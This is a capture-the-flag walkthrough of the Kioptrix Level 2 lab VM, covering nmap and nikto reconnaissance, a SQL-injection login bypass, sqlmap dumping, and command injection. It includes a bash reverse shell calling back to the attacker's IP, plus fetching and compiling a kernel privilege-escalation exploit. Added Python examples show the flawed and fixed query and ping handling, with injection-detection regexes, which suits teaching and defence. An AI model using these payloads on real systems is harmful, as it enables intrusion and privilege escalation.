Kioptrix_Level_2-update

I. Information Gathering

1. Host discovery with sudo arp-scan -l; the target's IP is identified as 192.168.65.135
2. Port and version scan with nmap -T4 -A -v 192.168.65.135; the results are as follows
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            854/udp   status
|_  100024  1            857/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2021-03-15T03:48:40+00:00; -3h09m38s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
3. Directory scan with nikto: nikto -host http://192.168.65.135/
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-03-15 03:34:03 (GMT-4) (61 seconds)
4. Browse port 80 and the paths turned up by the scan

II. Vulnerability Discovery

1. SQL injection at http://192.168.65.135/index.php
(1) Capture the request in Burp Suite and fuzz it to confirm
(2) Log in successfully with username=admin and password='or' 1=1--
(3) Dump the database with sqlmap (the commands below are not actually needed; treat them as sqlmap practice and skip this step if not interested)
  • sqlmap -r 12.txt --dbs --level 3 --risk 2 --batch
  • sqlmap -r 12.txt -D webapp --tables --level 3 --risk 2
  • sqlmap -r 12.txt -D webapp -T users --columns --level 3 --risk 2
  • sqlmap -r 12.txt -D webapp -T users -C username,password --dump --level 3 --risk 2
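The login bypass in step (2) works because the submitted credentials are concatenated into the SQL text. As an added example, not code from the original write-up or from the Kioptrix image, the following Python models that defective query beside its parameterised fix, using an in-memory SQLite table as an assumed stand-in for the target's MySQL users table (the test payload uses the same ' or 1=1-- tautology the write-up's password relies on), plus a crude input heuristic a defender can apply to logged form values:

```python
import re
import sqlite3

# Constructed stand-in for the target's login table. The real Kioptrix app
# runs PHP 4.3.9 against MySQL; an in-memory SQLite database is assumed here.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Defect: input is pasted into the SQL text. A password of ' or 1=1--
    # closes the quoted value, appends an always-true OR, and comments out
    # the trailing quote, so the WHERE clause matches every row.
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Fix: bound parameters are sent as data and never parsed as SQL syntax.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Crude log-review heuristic: a quote followed by OR, or a comment marker.
# It complements, and never replaces, parameterised queries.
SQLI_HINT = re.compile(r"'\s*or\b|--|/\*", re.IGNORECASE)

def looks_like_sqli(value: str) -> bool:
    return SQLI_HINT.search(value) is not None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "admin", "' or 1=1--"))  # True
    print("fixed:     ", login_safe(db, "admin", "' or 1=1--"))        # False
```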
2. Command execution vulnerability
(1) Confirm it with 127.0.0.1|ls
(2) Listen on Kali with nc -lvvp 1234, then spawn a reverse shell with 127.0.0.1|bash -i >& /dev/tcp/192.168.65.129/1234 0>&1
(3) Check the system version with uname -a
(4) Search the exploit database; a matching kernel-version exploit is found at https://www.exploit-db.com/exploits/9542
(5) Download 9542.c, then have the target fetch it
  • First download it onto Kali
  • Then start an HTTP server with python -m SimpleHTTPServer 9090
  • In the reverse shell obtained above, fetch it with wget http://192.168.65.129:9090/9542/9542.c
  • Then compile it with gcc 9542.c, run the resulting ./a.out, and privilege escalation succeeds
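The command execution in steps (1) and (2) of section 2 exists because the submitted ping target is handed to a shell as part of a command line. As an added example, not code from the original post or the Kioptrix image, the following Python shows that defective string-building pattern beside a hardened handler that validates the value as a literal IP address and runs ping as an argv list with no shell, plus a check over constructed form submissions that flags shell metacharacters for alerting:

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote

def build_ping_vulnerable(target: str) -> str:
    # Defect, mirroring the write-up's finding: the submitted value is
    # spliced into a shell command line, so "127.0.0.1|ls" pipes into ls.
    # Shown for comparison only; never executed here.
    return f"ping -c 3 {target}"

def build_ping_safe(target: str) -> list:
    # Fix 1: accept only a literal IPv4/IPv6 address; ipaddress raises
    # ValueError for anything else, including "127.0.0.1|ls".
    addr = ipaddress.ip_address(target.strip())
    # Fix 2: return argv for subprocess without a shell, so any unexpected
    # character would be an argument to ping, never a shell operator.
    return ["ping", "-c", "3", str(addr)]

def is_valid_target(target: str) -> bool:
    try:
        build_ping_safe(target)
        return True
    except ValueError:
        return False

def run_ping(target: str) -> subprocess.CompletedProcess:
    # shell=False is the default; argv goes straight to execve.
    return subprocess.run(build_ping_safe(target), capture_output=True,
                          text=True, timeout=15)

# Shell operators that turn a ping target into a second command
# (| ; & ` $ < > and newline), checked after URL-decoding.
SHELL_META = re.compile(r"[|;&`$<>\n]")

def flag_suspicious_targets(submitted_values):
    # Detection over logged form values: return the ones carrying shell
    # metacharacters, which a defender would alert on.
    return [v for v in submitted_values if SHELL_META.search(unquote(v))]

if __name__ == "__main__":
    # Constructed sample submissions: a normal one, the write-up's injection
    # and its URL-encoded form.
    samples = ["127.0.0.1", "127.0.0.1|ls", "127.0.0.1%7Cls"]
    print(flag_suspicious_targets(samples))  # ['127.0.0.1|ls', '127.0.0.1%7Cls']
```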
